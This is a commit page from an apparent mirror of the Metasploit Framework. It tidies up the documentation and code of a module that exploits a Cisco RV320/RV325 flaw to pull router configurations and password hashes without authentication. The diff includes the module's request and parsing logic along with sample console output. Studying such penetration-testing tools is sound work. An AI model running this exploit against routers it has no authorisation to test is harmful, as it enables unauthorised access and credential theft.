infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #11399, cisco_rv320_config updates

4.x
William Vu 2019-02-13 17:00:35 -06:00 committed by Metasploit
parent 187b38c190
commit b4fed15d40
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
2 changed files with 19 additions and 20 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
documentation/modules/auxiliary/gather/cisco_rv320_config.md
View File

@ -15,7 +15,7 @@ More context is available from [Rapid7's blog post](https://blog.rapid7.com/2019
4. `run` 4. `run`
5. Review the downloaded configuration file cited in the output. For example: 5. Review the downloaded configuration file cited in the output. For example:
>``` >```
>[+] Stored configuration (128658 bytes) to /home/administrator/.msf4/loot/20190206213439_default_172.16.0.34_cisco.rv.config_791561.txt >[+] Stored configuration (128658 bytes) to /home/administrator/.msf4/loot/20190206213439_default_192.168.1.1_cisco.rv.config_791561.txt
>``` >```
6. If the database is connected, review the `hosts`, `creds`, and `loot` commands 6. If the database is connected, review the `hosts`, `creds`, and `loot` commands
@ -27,7 +27,7 @@ More context is available from [Rapid7's blog post](https://blog.rapid7.com/2019
## Scenarios ## Scenarios
#### Against firmware version 1.4.2.15, which on the LAN side, port 443: #### Against firmware version 1.4.2.15, on the LAN interface, port 443:
``` ```
msf5 > msf5 >
@ -41,25 +41,25 @@ msf5 auxiliary(gather/cisco_rv320_config) > run
[*] Auxiliary module execution completed [*] Auxiliary module execution completed
``` ```
#### Against firmware version 1.4.2.15, on the WAN side, port 8007: #### Against firmware version 1.4.2.15, on the WAN interface, port 8007:
``` ```
msf5 > msf5 >
msf5 > use auxiliary/gather/cisco_rv320_config msf5 > use auxiliary/gather/cisco_rv320_config
msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 172.16.0.34 msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 203.0.113.54
RHOSTS => 192.168.1.1 RHOSTS => 203.0.113.54
msf5 auxiliary(gather/cisco_rv320_config) > set RPORT 8007 msf5 auxiliary(gather/cisco_rv320_config) > set RPORT 8007
RPORT => 8007 RPORT => 8007
msf5 auxiliary(gather/cisco_rv320_config) > set SSL false msf5 auxiliary(gather/cisco_rv320_config) > set SSL false
SSL => false SSL => false
msf5 auxiliary(gather/cisco_rv320_config) > run msf5 auxiliary(gather/cisco_rv320_config) > run
[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt [+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_203.0.113.54_cisco.rv.config_434637.txt
[*] Scanned 1 of 1 hosts (100% complete) [*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed [*] Auxiliary module execution completed
``` ```
#### Against firmware version 1.4.2.17, which on the LAN side, port 443: #### Against firmware version 1.4.2.17, on the LAN interface, port 443:
``` ```
msf5 > msf5 >
@ -73,7 +73,7 @@ msf5 auxiliary(gather/cisco_rv320_config) > run
[*] Auxiliary module execution completed [*] Auxiliary module execution completed
``` ```
#### Against newer firmware (>= 1.4.2.19): #### Against newer firmware (>= 1.4.2.19), on the LAN interface, port 443:
``` ```
msf5 > msf5 >
@ -96,7 +96,7 @@ Hosts
address mac name os_name os_flavor os_sp purpose info comments address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- -------- ------- --- ---- ------- --------- ----- ------- ---- --------
172.16.0.34 70:E4:22:94:E7:20 router94e720 Cisco RV320 203.0.113.54 70:E4:22:94:E7:20 router94e720 Cisco RV320
192.168.1.1 70:E4:22:94:E7:20 router94e720 Cisco RV320 192.168.1.1 70:E4:22:94:E7:20 router94e720 Cisco RV320
``` ```
@ -107,7 +107,7 @@ Credentials
host origin service public private realm private_type host origin service public private realm private_type
---- ------ ------- ------ ------- ----- ------------ ---- ------ ------- ------ ------- ----- ------------
172.16.0.34 192.168.1.1 8007/tcp (http) cisco $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/ Nonreplayable hash 203.0.113.54 192.168.1.1 8007/tcp (http) cisco $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/ Nonreplayable hash
192.168.1.1 192.168.1.1 443/tcp (https) cisco $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/ Nonreplayable hash 192.168.1.1 192.168.1.1 443/tcp (https) cisco $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/ Nonreplayable hash
``` ```
@ -119,6 +119,6 @@ Loot
host service type name content info path host service type name content info path
---- ------- ---- ---- ------- ---- ---- ---- ------- ---- ---- ------- ---- ----
172.16.0.34 cisco.rv.config text/plain /home/administrator/.msf4/loot/20190206213439_default_172.16.0.34_cisco.rv.config_791561.txt 203.0.113.54 cisco.rv.config text/plain /home/administrator/.msf4/loot/20190206213439_default_203.0.113.54_cisco.rv.config_791561.txt
192.168.1.1 cisco.rv.config text/plain /home/administrator/.msf4/loot/20190206211312_default_192.168.1.1_cisco.rv.config_412095.txt 192.168.1.1 cisco.rv.config text/plain /home/administrator/.msf4/loot/20190206211312_default_192.168.1.1_cisco.rv.config_412095.txt
``` ```

17
modules/auxiliary/gather/cisco_rv320_config.rb
View File

@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary
'Name' => 'Cisco RV320/RV326 Configuration Disclosure', 'Name' => 'Cisco RV320/RV326 Configuration Disclosure',
'Description' => %q{ 'Description' => %q{
A vulnerability in the web-based management interface of Cisco Small Business A vulnerability in the web-based management interface of Cisco Small Business
RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated,
remote attacker to retrieve sensitive information. The vulnerability is due remote attacker to retrieve sensitive information. The vulnerability is due
to improper access controls for URLs. An attacker could exploit this to improper access controls for URLs. An attacker could exploit this
vulnerability by connecting to an affected device via HTTP or HTTPS and vulnerability by connecting to an affected device via HTTP or HTTPS and
@ -48,7 +48,7 @@ class MetasploitModule < Msf::Auxiliary
]) ])
end end
def report_cred(user,hash) def report_cred(user, hash)
service_data = { service_data = {
address: rhost, address: rhost,
port: rport, port: rport,
@ -80,15 +80,14 @@ class MetasploitModule < Msf::Auxiliary
print_good("Stored configuration (#{config.length} bytes) to #{stored_path}") print_good("Stored configuration (#{config.length} bytes) to #{stored_path}")
# Report host information to database # Report host information to database
mac = config.match(/^LANMAC=(.*)/)[1]
mac = "%s:%s:%s:%s:%s:%s" % [mac[0..1], mac[2..3], mac[4..5],
mac[6..7], mac[8..9], mac[10..11]]
hostname = config.match(/^HOSTNAME=(.*)/)[1] hostname = config.match(/^HOSTNAME=(.*)/)[1]
model = config.match(/^MODEL=(.*)/)[1] model = config.match(/^MODEL=(.*)/)[1]
mac = config.match(/^LANMAC=(.*)/)[1]
mac = mac.scan(/\w{2}/).join(':')
report_host(host: rhost, report_host(host: rhost,
mac: mac, mac: mac,
name: hostname, name: hostname,
os_name: "Cisco", os_name: 'Cisco',
os_flavor: model) os_flavor: model)
# Report password hashes to database # Report password hashes to database
@ -105,11 +104,11 @@ class MetasploitModule < Msf::Auxiliary
'method' => 'GET', 'method' => 'GET',
}, 60) }, 60)
rescue OpenSSL::SSL::SSLError rescue OpenSSL::SSL::SSLError
fail_with(Failure::UnexpectedReply, "SSL handshake failed. Consider setting 'SSL' to 'false' and trying again.") fail_with(Failure::UnexpectedReply, 'SSL handshake failed. Consider setting SSL to false and trying again.')
end end
if res.nil? if res.nil?
fail_with(Failure::UnexpectedReply, "Empty response. Please validate the RHOST and TARGETURI options and try again.") fail_with(Failure::UnexpectedReply, 'Empty response. Please validate the RHOST and TARGETURI options and try again.')
elsif res.code != 200 elsif res.code != 200
fail_with(Failure::UnexpectedReply, "Unexpected HTTP #{res.code} response. Please validate the RHOST and TARGETURI options and try again.") fail_with(Failure::UnexpectedReply, "Unexpected HTTP #{res.code} response. Please validate the RHOST and TARGETURI options and try again.")
end end
@ -118,7 +117,7 @@ class MetasploitModule < Msf::Auxiliary
if body.match(/####sysconfig####/) if body.match(/####sysconfig####/)
parse_config(body) parse_config(body)
else body.include?"meta http-equiv=refresh content='0; url=/default.htm'" else body.include?"meta http-equiv=refresh content='0; url=/default.htm'"
fail_with(Failure::NotVulnerable, "Response suggests device is patched") fail_with(Failure::NotVulnerable, 'Response suggests device is patched')
end end
end end
end end